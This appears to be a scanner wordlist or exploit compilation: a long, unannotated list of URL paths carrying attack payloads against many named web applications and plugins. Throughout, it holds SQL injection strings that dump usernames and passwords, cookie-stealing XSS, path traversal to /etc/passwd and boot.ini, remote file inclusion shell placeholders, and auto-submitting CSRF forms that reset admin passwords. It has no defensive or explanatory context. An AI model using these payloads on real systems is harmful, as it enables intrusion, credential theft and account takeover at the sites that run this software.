/index.php?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- '
/KubeSupport/install/index.php?lang=[SQLI] 
/cms/news.php?id=9[CODE]
/cms/news.php?year=2010[CODE] 
/admin/articles.php?tPath=1&aID=1&action=update_article" method="post" name="main" enctype="multipart/form-data" >
/path/copy_folder.php?path=SITE/%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/[DIR]/cl_files/index.php (POST/Login name)
/[DIR]/cl_files/index.php?page=a&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=list&action=t&page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=&action=e&err=&#039;%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C&#039;
/[DIR]/cl_files/index.php?CLd=23&CLm=06&CLy=2010%22%3E%3Cscript%3Ealert(1)%3C/script%3E&name=[CALENDAR_NAME]&type=&action=e
/[DIR]/cl_files/index.php?page=e
/[DIR]/cl_files/index.php?page=a
/[DIR]/cl_files/index.php?page=a&name=[CALENDAR_NAME]">
/[DIR]/cl_files/index.php
/forum.php?mode=modify&band_id=0&t=<T>&c=<C>&post_id=<POST_ID>%00%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
/[path]/products.php?sid=1 (SQL) 
/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data
/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader
/path/news.php?view=3(SQL) 
/?q=user%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
/index.php?id=UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin-- 
/admin/admin.php?cat=cheats%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/search.php?view=forums" method="post" name="main" >
/admin/admin.php?view=manage&edit=2" method="post" name="main" >
/bible.php?string=&book=2&chapter=[SQLI]
/bible.php?string=&book=2&chapter=[XSS] 
/index.php?mode=[sqli]
/index.php?mode=[xss]
/showcategory.php?cid=[sqli] 
/index.php?view=[sqli] 
/classified_img.php?clsid=[SQLI] 
/image/view.php?image_id=[SQLI]
/image/view.php?image_id=[XSS] 
/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
/admin/admin.php?action=settings" method="post" name="main" >
/" />
/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where='
/precios.php3?marca=12' 
/news.php?id=[SQLi] 
/arcademsx/index.php?cat=[XSS] 
/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E 
/index.php?q=[SQLI]
/index.php?q=[XSS] 
/index.php?mod=none_Search&find="><script>alert(1)</script> 
/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
/state.php?data=country&val=italia&users_lang=[DT] 
/caricatier/comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1
/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00 
/products/shaadi/alert.php?id=%3Cscript%3Ealert(/XSS/)%3C/script%3E 
/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 
/frontend/x3/ftp/doaddftp.html">
/community/index.php?pageurl=Evil-code
/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E
/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E
/modules/slideshowmodule/slideshow.js.php?u=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/modules/forum/check.php 
/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/modules/gallery/view_img.php?imagename=%22&#039;);window.alert(&#039;XSS&#039;);document.write(&#039;%22
/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
/install/install1.php?language=%22%20onmouseover=alert()%3E
/install/install1.php?language=%22%20style=a
/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++
/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup 
/index.php?lang=[XSS] 
/search_process.php?searchtype="/><script>alert('XSS')</script> 
/admin/currencies.php?page=1"><script>alert(document.cookie)</script>&cID=1 
/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS] 
/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/yappa/yappa.php?thedir=[ command you ]
/yappa/yappa.php?image=[ command you] 
/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst
/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0
/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show 
/admin/edit_page.php?page=1[XSS]
/admin/edit_post.php?page=1[XSS]
/admin/add_post.php?page=1[XSS] 
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width
/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E 
/admin.php/seo/pages/manage-pages/editField?dm_cpi=0&dm_xhr=1&value=title"><script>alert(document.cookie)<%2Fscript>&id=&page_id=1&field=title
/admin.php/+/dmCore/markdown?dm_cpi=0&dm_xhr=1&text=title"><script>alert(document.cookie)<%2Fscript>
/admin.php/content/blog/articles/filter" name="main" >
/searchform.php?msg="/><script>alert('XSS')</script> 
/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)"> 
/basic_search_result.php?title=[XSS] 
/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script> 
/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
/admin/template/error_checking.php?err=true&msg=[XSS] 
/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>
/www.example.com/phpwcms.php?do=modules&module=calendar&calendardate=8-2010%22+onmouseover=alert%2834%29+style=position
/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >
/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script> 
/admin/index.php?app=settings"><script>alert(document.cookie)</script>
/admin/index.php?s=settings&x=pixie" method="post" name="main" >
/admin/index.php?s=settings&x=site" method="post" name="main" >
/search/1"><script>alert(document.cookie)</script>
/eph/index.php?action=code&pid=[XSS]
/eph/profile.php?action=view&uid=[XSS] 
/index.php?context[path_to_root]= [inj3ct0r shell] 
/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form> 
/recipes/admin/recipes.php?searchword="[XSS]
/recipes/admin/recipes.php?numitem="[XSS]
/recipes/admin/categories.php?searchword="[XSS]
/recipes/admin/categories.php?numitem="[XSS]
/recipes/admin/all_comments.php?searchword="[XSS]
/recipes/admin/all_comments.php?numitem="[XSS]
/recipes/admin/users.php?searchword="[XSS]
/recipes/admin/users.php?numitem="[XSS]
/recipes/admin/comments.php?searchword="[XSS]
/recipes/admin/comments.php?numitem="[XSS]
/recipes/admin/menus.php?numitem="[XSS]
/recipes/admin/links.php?searchword="[XSS]
/recipes/admin/links.php?numitem="[XSS]
/recipes/admin/banners.php?searchword="[XSS]
/recipes/admin/banners.php?numitem="[XSS]
/recipes/update_profile.php" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value="website.com"> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value="our@email.com"> <input type="checkbox" name="subscribed" value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="http
/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29, 
/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html 
/faq/index.php?action=showcat&cid=8&sid="[XSS] 
/site/cont_index.php?cms_id=PAGE_ID"><script>alert(document.cookie)</script> 
/cms//edit/tpl_element_settings_action.php" method="post" name="main" > <input type="hidden" name="action" value="save" /> <input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script> 
/cms//edit/tpl_edit_action.php" method="post" name="main" > <input type="hidden" name="action" value="save" /> <input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' /> <input type="hidden" name="winid" value="0" /> </form> <script> document.main.submit(); </script> Second code
/cms/edit/tpl_backup_action.php" method="post" name="main" > <input type="hidden" name="action" value="message" /> <input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' /> </form> <script> document.main.submit(); </script> 
/news/?calendar = "; alert (" ONsec.ru% 20Russian% 20security% 20team \ n \ n "% 2Bdocument.cookie); / / 
/comments.php?keyword=<script>alert(/Vulnerable/.source)</script>&since=
/comments.php?author=<script>alert(/Vulnerable/.source)</script>&since=
/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/%3Cbody%20onload=alert(document.cookie)%3E/
/cms/ua%20where%201=1--%20/ 
/ajaxfilemanager/ajaxfilemanager.php?path=../uploads/&view=1<script>alert("abysssec")</script>
/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E 
/starnet/index.php?option=modulemanager&module=3&modoption=saveconfig" method="post" name="main" >
/starnet/index.php?option=modulemanager&module=2&modoption=save_link&suboption=&page_id=3&link_id=2" method="post" name="main" >
/starnet/index.php?option=modulemanager&module=13&modoption=save_message&suboption=&message_id=1&cat_id=4" method="post" name="main" >
/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00 
/cms/templates/banner.php?bannerId=1%20and%20version()=5
/cms/templates/bannerlist.php?page=-1 
/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa 
/adpeeps/index.php?uid="><script>alert(0)</script>
/adpeeps/index.php?loc=login_lookup&uid="><script>alert(0)</script>
/adpeeps/index.php?loc=adminlogin&uid="><script>alert(0)</script>
/adpeeps/index.php?loc=createcampaign&mode=new&uid=100000&c ampaignid="><script>alert(0)</script>
/adpeeps/index.php?loc=view_account_stats&uid=100000&type=" ><script>alert(2)</script>&period="><script>alert(1)</script>
/adpeeps/index.php?loc=view_adrates&uid="><script>alert(0)</script>
/adpeeps/index.php?loc=account_confirmation&accname="><scri pt>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000
/adpeeps/index.php?loc=setup_account&e6=new&e12=bypass&e9=" ><script>alert(0)</script>
/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1& errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>
/adpeeps/index.php?loc=edit_ad_package&uid=100000&idno="><s cript>alert(0)</script>
/admin/system_pref/do_edit.php?f_campsite_online=Y&f_site_title=Kora"><script>alert(document.cookie)</script>&f_site_metakeywords=11&f_site_metadescription=22&f_cache_enabled=N&f_cache_engine=APC&f_imagecache_lifetime=86400&f_secret_key=1&f_session_lifetime=1400&f_keyword_separator=%2C&f_login_num=3&f_max_upload_filesize=16M&f_smtp_www.example.com=localwww.example.com&f_smtp_port=25&f_editor_image_ratio=100&f_external_subs_management=N&f_use_replication=N&f_db_repl_www.example.com=&f_db_repl_user=&f_db_repl_pass=&f_db_repl_port=3306&f_use_campcaster=N&f_cc_www.example.comname=localwww.example.com&f_cc_www.example.comport=80&f_cc_xrpcpath=%2Fcampcaster%2FstorageServer%2Fvar%2Fxmlrpc%2F&f_cc_xrpcfile=xrLocStor.php&f_template_filter=.*%2C+CVS&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C HTTP/1.1
/admin/comments/index.php" method="post" name="main" >
/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00 
/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
/music_out.php?p=29%27%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php 
/nothing,important,our.file.name.html%00
/?p=../path.to.our.php.file-nothing-important 
/group.php?tname=-%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10%20concat(user,0x3a,pass),11,12,13,14,%20from%20xxxxx%20 ... /* 
/folder/list?order_by=filesize&#039;+SQL
/user/main/update_settings" method="post"  name="main" >
/user/main/update_category/CATEGORY_ID" method="post"  name="main" >
/admin/update/2" method="post" name="main" >
/admin/pages/edit" method="post" >
/admin/posts/edit" method="post" >
/index.php?page=x<img+src%3Dx+onerror%3Dalert(document.cookie)> 
/admin.php?-table=pages&-search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&-action=search_index
/simpledirectorylisting/SDL2.php?cwdRelPath= '><script>alert(1)</script> 
/paolink/demo/scrivi.php/"><script>alert(document.cookie);</script>
/demo/index.php?cat=5&page=1"><script>alert(document.cookie);</script>
/paobacheca/demo/index.php/"><script>alert(document.cookie);</script>
/paobacheca/demo/scrivi.php/"><script>alert(document.cookie);</script>
/news.php?year=-2004+UNION+SELECT+1,2,3,4--
/news.php?id=-1+UNION+SELECT+1,2,3,4-- 
/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2 
/home/demo1/index.php?target=articles&subtarget=Article_Detail&selected=50+union+select+user%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
/home/demo1/index.php?target=search&subtarget=top&searchstring=%27/**/SQL_CODE
/home/demo1/index.php?target=articles&subtarget=X%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/home/demo1/index.php?target=search&subtarget=top&searchstring=%3Cimg+src=0+onerror=alert%28document.cookie%29%3E
/home/demo1/manage.php?target=Home&subtarget=top%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/home/demo1/manage.php?target=./../../../../../../../../../../../../etc/passwd%00
/home/demo1/manage.php?target=./../../../../../../../../../../../../path/to/php_file%00
/home/demo1/index.php?target=./../../../../../../../../../../../../etc/passwd%00
/home/demo1/index.php?target=./../../../../../../../../../../../../path/to/php_file%00
/index.php?w=5&search_text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/admin/create_new_category" method="post" name="main" >
/admin/create_new_status" method="post"  name="main" >
/admin/settings/update" method="post" name="main" >
/admin/categories/update/1" method="post" name="main" >
/demos/beex3/news.php?page=1&Sortieren=0&navaction="><script>alert(document.cookie);</script>
/demos/beex3/partneralle.php?page=1&navaction="><script>alert(document.cookie);</script>
/tools/view_map.php?zipcode="><script>alert(document.cookie);</script>
/tools/email.php?videoid="><script>alert(document.cookie);</script>
/tools/login.php?redirect="><script>alert(document.cookie);</script>
/{path}/index.php?option=com_weblinks&view=categories&Itemid=[SQL] 
/admin/users.php?message=<script>alert(document.cookie);</script>
/admin/category.php?message=<script>alert(document.cookie);</script>
/admin/entry.php?message=<script>alert(document.cookie);</script>
/admin/newentry.php?message=<script>alert(document.cookie);</script>
/admin/comments.php?message=<script>alert(document.cookie);</script>
/admin/newpage.php?message=<script>alert(document.cookie);</script>
/admin/page.php?message=<script>alert(document.cookie);</script>
/admin/settings.php?message=<script>alert(document.cookie);</script>
/admin/changeclothes.php?message=<script>alert(document.cookie);</script>
/admin/settings_theme.php?message=<script>alert(document.cookie);</script>
/admin/themes.php?message=<script>alert(document.cookie);</script>
/admin/plugins.php?message=<script>alert(document.cookie);</script> 
/{path}/index.php?option=com_fireboard&Itemid=[SQL] 
/" method="post" name="main" >
/" method="post" name="main" >
/" method="post" name="main" >
/" method="post" name="main" >
/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/index.html%27%22--%3E%3Cscript%3Ealert%28%22Corelan%22%29%3C/script%3E
/lite-chat-login.html
/questiondetail.php?questionid="><script>alert(document.cookie);</script>
/index.php?page=1>"><ScRiPt %0D%0A>alert(400686892848)%3B</ScRiPt>
/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL
/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL
/biblioteca/index.php?action=bib_searchs&method=searchs&key_words=example%22%27%3E%3Cscript%3Ealert(1)%3C/script%3E 
/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=127.0.0.1&s=m/&d=1 
/kbase/kbase.php/"><script>alert(document.cookie);</script>
/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
/shop.htm?cid=31+and+1=1
/shop.htm?cid=31+and+1=100 
/answers?q_id=1>"><ScRiPt %0D%0A>alert(413587968783)%3B</ScRiPt>
/cacti/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&page=1&action=view_logfile
/index.php?option=com_blastchatc&Itemid=" onload="alert(/XSS/)" 
/index.php" method="post" name="main" enctype="multipart/form-data" >
/www/index.php?admin=1&section=content&action=edit&id=PAGE_ID'+ANY_SQL
/www/index.php?template=home&content=home'+ANY_SQL
/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE
/www/index.php?template=blog&id=1'+ANY_SQL_CODE
/www/index.php" method="post" name="main" >
/www/index.php" method="post" name="main" >
/www/index.php?admin=1&section=language"><script>alert(document.cookie)</script>&action=addLanguage
/www/index.php?template=./../../../../../../../tmp/test.php%00
/www/index.php?admin=1&section=style&action=editStylesheet&name=./../../../../../../../tmp/test.php
/index.php" method="post" name="main" >
/index.php" method="post" name="main" >
/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>
/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE
/" /> 
//hpdiags/parameters.php?device="</XSS STYLE=xss
/hpdiags/idstatusframe.php?pid="%20</XSS STYLE=xss
/hpdiags/survey.php?category=");//}</XSS/*-*/STYLE=xss
/hpdiags/globals.php?tabpage=";alert(1)//
/hpdiags/custom.php?testMode=blah';</XSS%20STYLE=xss
/friendy/photo_view.php?photo_id=13&return="><script>alert(document.cookie);</script>
/friendy/photo_search.php?st="><script>alert(document.cookie);</script>
/friendy/search.php?st="><script>alert(document.cookie);</script>
/_admin/faq.php" method="post" name="main" >
/_admin/news.php" method="post" name="main" enctype="multipart/form-data" >
/index.php" method="post" name="main" >
/index.php" method="post" name="main" >
/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL] 
/index.php?do=search&q=PUUUUKE%22%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&x=0&y=0
/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/c.php?id=1%20and%20version()=5 
/filename.php/1%3CScRiPt%3Eprompt(923395)%3C/ScRiPt%3E"
//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f
/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search 
/profile.php?profile_id=568&s_r="><script>alert(document.cookie);</script>
/path/printnews.php3?id=[shell.txt?] 
/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
/photos.php?hotel_id=1' << SQL >>
/map.php?hotel_id=1' << SQL >>
/weather.php?hotel_id=1' << SQL >>
/reviews.php?hotel_id=1' << SQL >>
/book.php?hotel_id=1' << SQL >>
/edit_profile.php?important="><script>alert(document.cookie);</script>
/report.php?pid="><script>alert(document.cookie);</script>
/util/icon_browser.php?subdir=[xss]&app=horde 
/index.php?resman_startdate=[XSS] 
/admincp.php?rootpath=(rfi) 
/index.php?page=lang/interface_en.lng%00 
/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E 
/?q=<script>alert(123)</script>&mode=2
/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar 
/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E 
/search.php?q=[XSS]
/image.php?image=[XSS] 
/search.html?search=1"><script>alert(document.cookie)</script>&x=0&y=0
/home/search.php?search_text=txt"><script>alert(document.cookie)</script>&catid=&search=Search
/home/editor/edit_content.php?_cid=PAGE_ID" method="post" name="main" enctype="multipart/form-data" >
/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >
/index.php" method="post" name="main" enctype="multipart/form-data" >
/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
/demo/?action=search&search=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&gateway=%E4%E3%D8+%C7%E1%C8%CD%CB&by=words
/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E 
/demos/escorts-agency/escorts_search.php => Your XSS 
/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28 
/index.php?cmd=../../../../../../../../windows/system.ini%00 
/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00 
/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E 
/ajauctionpro/oopdv3/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon
/category.php?ID="><script>alert(document.cookie);</script>
/wcategory.php?ID="><script>alert(document.cookie);</script>
/search.php?go=1&keywords="><script>alert(document.cookie);</script>
/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E 
/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search
/SearchAction.php?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO
/forgot.html => put 
/scripts/jokes-portal/SearchAction.php?what=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&ssub=GO
/login.php
/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29 
/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
